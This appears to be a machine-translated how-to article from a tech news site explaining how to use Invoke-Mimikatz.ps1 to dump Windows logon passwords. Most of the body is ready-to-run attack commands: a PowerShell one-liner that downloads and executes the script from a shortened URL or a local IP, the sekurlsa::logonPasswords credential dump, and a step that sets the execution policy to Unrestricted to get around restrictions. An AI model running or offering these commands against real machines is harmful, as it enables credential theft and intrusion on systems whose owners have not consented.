Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Invoke-Mimikatz.ps1 acquires the system password

2025-01-17 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

(1) Invoke-Mimikatz.ps1 download address

Https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

(2) have the network environment to execute orders directly.

Powershell "IEX (New-Object Net.WebClient) .DownloadString ('http://is.gd/oeoFuI'); Invoke-Mimikatz-DumpCreds"

(3) Local network environment

Powershell "IEX (New-Object Net.WebClient) .DownloadString ('http://192.168.1.1/');Invoke-Mimikatz-DumpCreds"

(4) download local execution

In a word:

Powershell Import-Module.\ Invoke-Mimikatz.ps1;Invoke-Mimikatz-Command'"privilege::debug"sekurlsa::logonPasswords full"'

Subject to authorization restrictions:

Get-ExecutionPolicy / / result shows restricted

Set-ExecutionPolicy Unrestricted / / Open restrictions

Import-Module.\ Invoke-Mimikatz.ps1 / / Import command

Invoke-Mimikatz-Command'"privilege::debug"sekurlsa::logonPasswords full" / / get the password

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report